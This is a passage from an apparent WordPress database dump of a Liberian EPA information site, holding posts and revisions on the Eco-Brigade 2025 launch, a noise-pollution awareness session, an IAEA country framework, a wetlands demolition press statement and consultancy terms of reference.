stewardship cannot be imposed, it must be lived,” he stated, calling for strong policy support, political will, and partnerships.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA acting Deputy Executive Director praised the support of UNDP, SCNL, and other partners, saying their contributions are helping change lives and protect nature. He reminded the people of Bomi that the success of the Eco-Brigade depends on their ownership and commitment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“To the people of Bomi, this is your program. The environment belongs to us all, and its protection must be our shared duty,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other speakers at the event included Tubmanburg City Mayor Hon. Mohamed A. Sheriff, Bomi County Superintendent Hon. Miatta E. Dorley, and representatives from the Ministry of Youth and Sports, the Ministry of Commerce, and the Society for the Conservation of Nature of Liberia (SCNL).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The launch activities featured a parade, formal presentations, remarks from key stakeholders, and group photos with participants.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie urged Liberians to “plant trees of hope, build businesses of resilience, and nurture a nation where economic progress and environmental sustainability walk hand in hand.”</p>\n<!-- /wp:paragraph -->','Eco-Brigade 2025 Launched in Bomi to Tackle Climate and Pollution Challenges','','publish','open','open','','eco-brigade-2025-launched-in-bomi-to-tackle-climate-and-pollution-challenges','','','2025-08-29 14:40:56','2025-08-29 14:40:56','',0,'https://ekmsliberia.info/?p=5601',39,'post','',0),(5602,38,'2025-08-29 14:40:45','2025-08-29 14:40:45','','project','','inherit','open','closed','','project','','','2025-08-29 14:40:45','2025-08-29 14:40:45','',5601,'https://ekmsliberia.info/wp-content/uploads/2025/08/project.jpg',0,'attachment','image/jpeg',0),(5603,38,'2025-08-29 14:40:53','2025-08-29 14:40:53','<!-- wp:paragraph -->\n<p>Tubmanburg, Bomi County, August 20, 2025 – The people of Bomi County joined national leaders and international partners on Wednesday, August 20, 2025, to launch the T-Burg Eco-Brigade 2025, a new program aimed at addressing the growing challenges of climate change, deforestation, and pollution in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Eco-Brigade is a community-based environmental program in Liberia that brings together young people, women, and even persons with disabilities to actively engage in protecting and conserving the environment while also creating opportunities for jobs and empowerment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The ceremony, held in Tubmanburg, brought together government officials, representatives of the United Nations Development Programme (UNDP), civil society, youth groups, and traditional leaders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the event, Hon. Anthony S. Kollie, Acting Deputy Executive Director of the Environmental Protection Agency of Liberia (EPA), called the initiative “a movement of hope, action, and transformation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie explained that the Eco-Brigade will train young people, empower women, and include persons with disabilities to take part in environmental protection while creating opportunities for decent jobs and green businesses.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“For every young person trained in green entrepreneurship, for every woman empowered with skills to run an eco-friendly business, and for every person with disability given a place in this brigade, we are breaking the cycle of poverty and inequality while strengthening our resilience to climate change,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that Liberia’s forests, rivers, wetlands, and coastlines are under serious threat and stressed that community involvement is key to safeguarding the country’s natural resources. “Environmental stewardship cannot be imposed, it must be lived,” he stated, calling for strong policy support, political will, and partnerships.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA acting Deputy Executive Director praised the support of UNDP, SCNL, and other partners, saying their contributions are helping change lives and protect nature. He reminded the people of Bomi that the success of the Eco-Brigade depends on their ownership and commitment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“To the people of Bomi, this is your program. The environment belongs to us all, and its protection must be our shared duty,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other speakers at the event included Tubmanburg City Mayor Hon. Mohamed A. Sheriff, Bomi County Superintendent Hon. Miatta E. Dorley, and representatives from the Ministry of Youth and Sports, the Ministry of Commerce, and the Society for the Conservation of Nature of Liberia (SCNL).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The launch activities featured a parade, formal presentations, remarks from key stakeholders, and group photos with participants.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie urged Liberians to “plant trees of hope, build businesses of resilience, and nurture a nation where economic progress and environmental sustainability walk hand in hand.”</p>\n<!-- /wp:paragraph -->','Eco-Brigade 2025 Launched in Bomi to Tackle Climate and Pollution Challenges','','inherit','closed','closed','','5601-revision-v1','','','2025-08-29 14:40:53','2025-08-29 14:40:53','',5601,'https://ekmsliberia.info/?p=5603',0,'revision','',0),(5604,38,'2025-08-29 14:49:58','2025-08-29 14:49:58','','GH','','inherit','open','closed','','gh','','','2025-08-29 14:49:58','2025-08-29 14:49:58','',5598,'https://ekmsliberia.info/wp-content/uploads/2025/08/GH.jpg',0,'attachment','image/jpeg',0),(5605,38,'2025-08-30 11:44:00','2025-08-30 11:44:00','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – August 29, 2025 – The Environmental Protection Agency (EPA) of Liberia continued its commitment to internal environmental education today with its latest installment of the \"Know Your Environment\" program—this time sounding the alarm on the growing threat of noise pollution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held at the conference room of the Department of Compliance and Enforcement at the EPA headquarters, the recurring educational initiative brought together employees and senior staff to explore the serious environmental and health impacts of excessive noise. The event aimed to strengthen institutional knowledge and encourage EPA workers to become stewards of environmental awareness in their communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his opening remarks, Christopher Kabah, Director of Planning and Policy at the EPA, welcomed staff and highlighted noise pollution as the focal point of this edition. “Noise pollution is no longer a minor nuisance,” Kabah emphasized, “it’s a serious environmental issue with long-term consequences.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Acting Deputy Executive Director (DED) of the EPA, Anthony Kollie, urged staff to take full advantage of the program, describing it as a unique opportunity to build both personal and professional capacity. “This initiative does more than just inform,” Kollie said. “It empowers. It helps citizens understand environmental policies, promotes compliance, and fosters environmental stewardship.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kollie also expressed admiration for Rafael Ngumbu, Director of Environmental Research and Radiation Standards (ERRS), who served as the keynote presenter. “Ngumbu is one of our most respected environmental professionals,” he noted, praising his dedication and technical expertise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Taking the stage, Ngumbu thanked agency leadership and attendees for their presence, before diving into the crux of the presentation—noise pollution, a subject he described as both urgent and underestimated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Referencing a professional visit to Sierra Leone, Ngumbu recounted being impressed by the environmental awareness exhibited by even the janitorial staff and drivers of Sierra Leone’s environmental agency. “We need that level of integration and awareness here in Liberia,” he urged.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ngumbu also referenced recent public discussions led by Dr. Emmanuel K. Urey Yarkpawolo, noting the increasing public concern around noise levels in urban and rural communities. “Noise is not just loud sound,” Ngumbu explained. “It is any sound that adversely impacts human health or the natural environment.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Citing alarming figures from the World Health Organization (WHO), Ngumbu warned that 1.1 billion people globally are at risk of hearing loss due to prolonged exposure to excessive noise. He added that noise pollution contributes to approximately 2.2 million health-related cases each year. “This is why the EPA is actively enforcing Liberia’s 2017 regulations on noise pollution,” he affirmed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Common sources of noise pollution, Ngumbu noted, include transportation systems, industrial operations, entertainment centers, power generators, religious gatherings, and bustling marketplaces. “The longer someone is exposed to high decibel sound, the greater the risk to their hearing and overall health,” he said, noting that around 5% of the global population already suffers from hearing impairment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ngumbu concluded with a call to action: “EPA employees must be the ambassadors of noise control. If we don’t lead by example, how can we expect others to follow?”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As Liberia grapples with rapid urbanization and growing industrial activity, today’s session served as a timely reminder that protecting the environment starts from within—and that silence, too, can be golden.</p>\n<!-- /wp:paragraph -->','Liberia’s EPA Sounds the Alarm on Noise Pollution During Environmental Awareness Session','','publish','open','open','','liberias-epa-sounds-the-alarm-on-noise-pollution-during-environmental-awareness-session','','','2025-09-04 12:05:32','2025-09-04 12:05:32','',0,'https://ekmsliberia.info/?p=5605',38,'post','',0),(5606,38,'2025-09-01 12:00:21','2025-09-01 12:00:21','','Noise pic','','inherit','open','closed','','noise-pic','','','2025-09-01 12:00:21','2025-09-01 12:00:21','',5605,'https://ekmsliberia.info/wp-content/uploads/2025/09/Noise-pic.jpg',0,'attachment','image/jpeg',0),(5607,38,'2025-09-01 12:01:12','2025-09-01 12:01:12','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – August 29, 2025 – The Environmental Protection Agency (EPA) of Liberia continued its commitment to internal environmental education today with its latest installment of the \"Know Your Environment\" program—this time sounding the alarm on the growing threat of noise pollution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held at the conference room of the Department of Compliance and Enforcement at the EPA headquarters, the recurring educational initiative brought together employees and senior staff to explore the serious environmental and health impacts of excessive noise. The event aimed to strengthen institutional knowledge and encourage EPA workers to become stewards of environmental awareness in their communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his opening remarks, Christopher Kabah, Director of Planning and Policy at the EPA, welcomed staff and highlighted noise pollution as the focal point of this edition. “Noise pollution is no longer a minor nuisance,” Kabah emphasized, “it’s a serious environmental issue with long-term consequences.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Acting Deputy Executive Director (DED) of the EPA, Anthony Kollie, urged staff to take full advantage of the program, describing it as a unique opportunity to build both personal and professional capacity. “This initiative does more than just inform,” Kollie said. “It empowers. It helps citizens understand environmental policies, promotes compliance, and fosters environmental stewardship.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kollie also expressed admiration for Rafael Ngumbu, Director of Environmental Research and Radiation Standards (ERRS), who served as the keynote presenter. “Ngumbu is one of our most respected environmental professionals,” he noted, praising his dedication and technical expertise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Taking the stage, Ngumbu thanked agency leadership and attendees for their presence, before diving into the crux of the presentation—noise pollution, a subject he described as both urgent and underestimated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Referencing a professional visit to Sierra Leone, Ngumbu recounted being impressed by the environmental awareness exhibited by even the janitorial staff and drivers of Sierra Leone’s environmental agency. “We need that level of integration and awareness here in Liberia,” he urged.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ngumbu also referenced recent public discussions led by Dr. Emmanuel K. Urey Yarkpawolo, noting the increasing public concern around noise levels in urban and rural communities. “Noise is not just loud sound,” Ngumbu explained. “It is any sound that adversely impacts human health or the natural environment.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Citing alarming figures from the World Health Organization (WHO), Ngumbu warned that 1.1 billion people globally are at risk of hearing loss due to prolonged exposure to excessive noise. He added that noise pollution contributes to approximately 2.2 million health-related cases each year. “This is why the EPA is actively enforcing Liberia’s 2017 regulations on noise pollution,” he affirmed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Common sources of noise pollution, Ngumbu noted, include transportation systems, industrial operations, entertainment centers, power generators, religious gatherings, and bustling marketplaces. “The longer someone is exposed to high decibel sound, the greater the risk to their hearing and overall health,” he said, noting that around 5% of the global population already suffers from hearing impairment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ngumbu concluded with a call to action: “EPA employees must be the ambassadors of noise control. If we don’t lead by example, how can we expect others to follow?”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As Liberia grapples with rapid urbanization and growing industrial activity, today’s session served as a timely reminder that protecting the environment starts from within—and that silence, too, can be golden.</p>\n<!-- /wp:paragraph -->','Liberia’s EPA Sounds the Alarm on Noise Pollution During Environmental Awareness Session','','inherit','closed','closed','','5605-revision-v1','','','2025-09-01 12:01:12','2025-09-01 12:01:12','',5605,'https://ekmsliberia.info/?p=5607',0,'revision','',0),(5609,38,'2025-10-23 15:01:01','2025-10-23 15:01:01','<strong>INTRODUCTION </strong>\r\n\r\nThe C:PF for Liberia (2026-2030) outlines strategic areas for technical cooperation between Liberia and the IAEA, where nuclear technology can significantly support national development. The CPF is aligned with the national ARREST Agenda for Inclusive Development (2025-2029) and relevant sectoral plans. The CPF was developed through broad-based consultations involving policymakers and technical experts across multiple ministries and institutions, including the Environmental Protection Agency (EPA), Ministry of Foreign Affairs (MoFA), Ministry of Agriculture (MOA). Ministry of Health (MOH), Ministry of Mines and Energy (MME), JFK Medical Centre and the University of Liberia. The process was coordinated by the National Liaison Office and incorporated gender considerations and inclusive stakeholder engagement to reflect diverse perspectives. The CPF identifies six priority areas for technical cooperation: (i) nuclear and radiation safety and security, (ii) food and agriculture (including crop productivity. animal health, soil and water management, and food safety). (iii) human health and nutrition (including radiotherapy for cancer care). and (iv) energy and industry.','Country Programme Framework 2026–2030','','publish','closed','closed','','country-programme-framework-2026-2030','','','2025-10-23 15:23:07','2025-10-23 15:23:07','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5609',15,'document','',0),(5610,38,'2025-10-23 14:42:33','2025-10-23 14:42:33','','Screenshot 2025-10-23 at 14.31.10','','inherit','open','closed','','screenshot-2025-10-23-at-14-31-10','','','2025-10-23 14:42:33','2025-10-23 14:42:33','',5609,'https://ekmsliberia.info/wp-content/uploads/2025/10/Screenshot-2025-10-23-at-14.31.10.png',0,'attachment','image/png',0),(5611,38,'2025-10-23 14:59:01','2025-10-23 14:59:01','','Liberia CPF 2026 - 2030','','inherit','open','closed','','liberia-cpf-2026-2030','','','2025-10-23 15:01:01','2025-10-23 15:01:01','',5609,'https://ekmsliberia.info/wp-content/uploads/2025/10/Liberia-CPF-2026-2030.pdf',0,'attachment','application/pdf',0),(5612,38,'2025-10-23 15:01:01','2025-10-23 15:01:01','<strong>INTRODUCTION </strong>\r\n\r\nThe C:PF for Liberia (2026-2030) outlines strategic areas for technical cooperation between Liberia and the IAEA, where nuclear technology can significantly support national development. The CPF is aligned with the national ARREST Agenda for Inclusive Development (2025-2029) and relevant sectoral plans. The CPF was developed through broad-based consultations involving policymakers and technical experts across multiple ministries and institutions, including the Environmental Protection Agency (EPA), Ministry of Foreign Affairs (MoFA), Ministry of Agriculture (MOA). Ministry of Health (MOH), Ministry of Mines and Energy (MME), JFK Medical Centre and the University of Liberia. The process was coordinated by the National Liaison Office and incorporated gender considerations and inclusive stakeholder engagement to reflect diverse perspectives. The CPF identifies six priority areas for technical cooperation: (i) nuclear and radiation safety and security, (ii) food and agriculture (including crop productivity. animal health, soil and water management, and food safety). (iii) human health and nutrition (including radiotherapy for cancer care). and (iv) energy and industry.','Country Programme Framework 2026–2030','','inherit','closed','closed','','5609-revision-v1','','','2025-10-23 15:01:01','2025-10-23 15:01:01','',5609,'https://ekmsliberia.info/?p=5612',0,'revision','',0),(5613,38,'2025-10-24 13:54:56','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>Press Statement</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Demolishes Illegal Structures to Reclaim Wetlands in Margibi County</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Margibi Coun ty, Liberia – October 23, 2025 – The Environmental Protection Agency of Liberia (EPA), through the National Wetlands Taskforce, on Thursday demolished dozens of illegally constructed structures within the Marshall Wetland along the Roberts International Airport highway in Schefflin Township, Margibi County. The action is part of a sustained nationwide enforcement effort to reclaim and restore protected wetlands degraded by illegal land sales, backfilling, dumping, and unapproved construction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Wetlands are among Liberia’s most valuable ecosystems—providing natural flood control, water purification, and critical breeding habitats for fish and other aquatic life. Continued encroachment threatens these vital services, exposing communities to increased flooding, pollution, and the loss of biodiversity and livelihoods.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The day’s demolition was a clear warning to individuals and land dealers who persist in selling, purchasing, or constructing on wetlands despite repeated public advisories. Such actions are environmental crimes and will be met with firm enforcement under the Environmental Protection and Management Law of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA, through the National Wetlands Taskforce, will continue to profile offenders and turn cases over to the Ministry of Justice for prosecution. In parallel, the Agency is strengthening collaboration with communities, civil society, and international partners to advance sustainable wetland management, including targeted conservation and restoration programs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of its long-term plan, the EPA will train local residents as frontline conservation stewards to monitor, protect, and restore wetlands within their communities—empowering citizens to safeguard their environment and support climate resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA urges all Liberians to refrain from purchasing or constructing in wetlands and to promptly report illegal land sales or development activities to the nearest EPA office.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Protecting wetlands means protecting lives, livelihoods, and the future of our environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For Media inquiries, please contact:<br>EPA Media and Corporate Communications<br>Environmental Protection Agency of Liberia<br>Email: info@epa.gov.lr</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Signed:<br>Danise Love Dennis-Dodoo (Mrs.)<br>Head of Media and Corporate Communications<br>Environmental Protection Agency of Liberia (EPA)</p>\n<!-- /wp:paragraph -->','EPA Demolishes Illegal Structures to Reclaim Wetlands in Margibi County','','draft','open','open','','','','','2025-10-24 13:54:56','2025-10-24 13:54:56','',0,'https://ekmsliberia.info/?p=5613',37,'post','',0),(5614,38,'2025-10-27 10:24:09','2025-10-27 10:24:09','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\n<strong> </strong>The main objective is to design climate risk management financing for representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>Develop standardized training manuals on climate risk management financing.</li>\r\n 	<li>Align financial institution procedures with community needs and realities.</li>\r\n 	<li>Strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>Enhance financial literacy and awareness of climate financing at the community level.</li>\r\n 	<li>To design training content on products tailored to women-run MSMEs to promote gender equality.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/10/ToR-for-International-Financial-Specialist.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','International Inclusive Finance Specialist','','publish','closed','closed','','international-inclusive-finance-specialist','','','2025-10-27 10:24:09','2025-10-27 10:24:09','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5614',39,'ekms_bulletin','',0),(5615,38,'2025-10-27 10:15:40','2025-10-27 10:15:40','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\n<strong> </strong>The main objective is to design climate risk management financing for representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>Develop standardized training manuals on climate risk management financing.</li>\r\n 	<li>Align financial institution procedures with community needs and realities.</li>\r\n 	<li>Strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>Enhance financial literacy and awareness of climate financing at the community level.</li>\r\n 	<li>To design training content on products tailored to women-run MSMEs to promote gender equality.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to Download:','International Inclusive Finance Specialist','','inherit','closed','closed','','5614-revision-v1','','','2025-10-27 10:15:40','2025-10-27 10:15:40','',5614,'https://ekmsliberia.info/?p=5615',0,'revision','',0),(5616,38,'2025-10-27 10:20:51','2025-10-27 10:20:51','','ToR for International Financial Specialist','','inherit','open','closed','','tor-for-international-financial-specialist','','','2025-10-27 10:20:51','2025-10-27 10:20:51','',0,'https://ekmsliberia.info/wp-content/uploads/2025/10/ToR-for-International-Financial-Specialist.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5617,38,'2025-10-27 10:24:09','2025-10-27 10:24:09','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\n<strong> </strong>The main objective is to design climate risk management financing for representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific objectives:\r\n<ul>\r\n 	<li>Develop standardized training manuals on climate risk management financing.</li>\r\n 	<li>Align financial institution procedures with community needs and realities.</li>\r\n 	<li>Strengthen collaboration between banks, microfinance institutions, and community financial structures.</li>\r\n 	<li>Enhance financial literacy and awareness of climate financing at the community level.</li>\r\n 	<li>To design training content on products tailored to women-run MSMEs to promote gender equality.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/10/ToR-for-International-Financial-Specialist.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','International Inclusive Finance Specialist','','inherit','closed','closed','','5614-revision-v1','','','2025-10-27 10:24:09','2025-10-27 10:24:09','',5614,'https://ekmsliberia.info/?p=5617',0,'revision','',0),(5618,38,'2025-10-27 10:39:57','2025-10-27 10:39:57','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n&nbsp;\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe primary objective of this assignment is to conduct detailed market studies within the target communities of Grand Cape Mount County to:\r\n<ul>\r\n 	<li>Assess the current state of financial services (formal and informal) used by the population.</li>\r\n 	<li>Identify key barriers to accessing financial services (gender-based, geographic, socio-economic).</li>\r\n 	<li>Map existing providers and products in the local financial ecosystem.</li>\r\n 	<li>Understand the financial behaviors, needs, and preferences of community members.</li>\r\n 	<li>Recommend strategies to improve access, inclusion, and utilization of financial services</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/10/Final-Market-Stuties-National-Consultant-ToR.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultant, Inclusive Finance Specialist','','publish','closed','closed','','national-consultant-inclusive-finance-specialist','','','2025-10-27 10:39:57','2025-10-27 10:39:57','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5618',38,'ekms_bulletin','',0),(5619,38,'2025-10-27 10:37:57','2025-10-27 10:37:57','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n&nbsp;\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe primary objective of this assignment is to conduct detailed market studies within the target communities of Grand Cape Mount County to:\r\n<ul>\r\n 	<li>Assess the current state of financial services (formal and informal) used by the population.</li>\r\n 	<li>Identify key barriers to accessing financial services (gender-based, geographic, socio-economic).</li>\r\n 	<li>Map existing providers and products in the local financial ecosystem.</li>\r\n 	<li>Understand the financial behaviors, needs, and preferences of community members.</li>\r\n 	<li>Recommend strategies to improve access, inclusion, and utilization of financial services</li>\r\n</ul>','National Consultant, Inclusive Finance Specialist','','inherit','closed','closed','','5618-revision-v1','','','2025-10-27 10:37:57','2025-10-27 10:37:57','',5618,'https://ekmsliberia.info/?p=5619',0,'revision','',0),(5620,38,'2025-10-27 10:38:51','2025-10-27 10:38:51','','Final Market Stuties National Consultant ToR','','inherit','open','closed','','final-market-stuties-national-consultant-tor','','','2025-10-27 10:38:51','2025-10-27 10:38:51','',0,'https://ekmsliberia.info/wp-content/uploads/2025/10/Final-Market-Stuties-National-Consultant-ToR.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5621,38,'2025-10-27 10:39:57','2025-10-27 10:39:57','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n&nbsp;\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe primary objective of this assignment is to conduct detailed market studies within the target communities of Grand Cape Mount County to:\r\n<ul>\r\n 	<li>Assess the current state of financial services (formal and informal) used by the population.</li>\r\n 	<li>Identify key barriers to accessing financial services (gender-based, geographic, socio-economic).</li>\r\n 	<li>Map existing providers and products in the local financial ecosystem.</li>\r\n 	<li>Understand the financial behaviors, needs, and preferences of community members.</li>\r\n 	<li>Recommend strategies to improve access, inclusion, and utilization of financial services</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/10/Final-Market-Stuties-National-Consultant-ToR.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultant, Inclusive Finance Specialist','','inherit','closed','closed','','5618-revision-v1','','','2025-10-27 10:39:57','2025-10-27 10:39:57','',5618,'https://ekmsliberia.info/?p=5621',0,'revision','',0),(5622,38,'2025-10-27 10:50:13','2025-10-27 10:50:13','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nThe main objective is to deliver training on climate risk management financing to representatives of financial institutions, thereby promoting sustainable and inclusive financing practices.\r\n\r\nSpecific 